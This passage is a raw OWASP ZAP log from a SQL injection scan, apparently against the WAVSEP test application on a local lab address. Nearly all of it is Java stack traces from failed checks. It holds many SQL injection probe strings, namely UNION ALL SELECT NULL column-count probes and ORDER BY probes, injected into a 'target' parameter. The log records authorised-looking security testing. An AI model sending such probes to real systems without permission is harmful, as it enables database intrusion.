org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681019 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681019 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681020 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9681020 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681021 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681022 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681023 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 8768#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 8768# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681024 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681025 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681026 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681027 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681028 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681029 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at 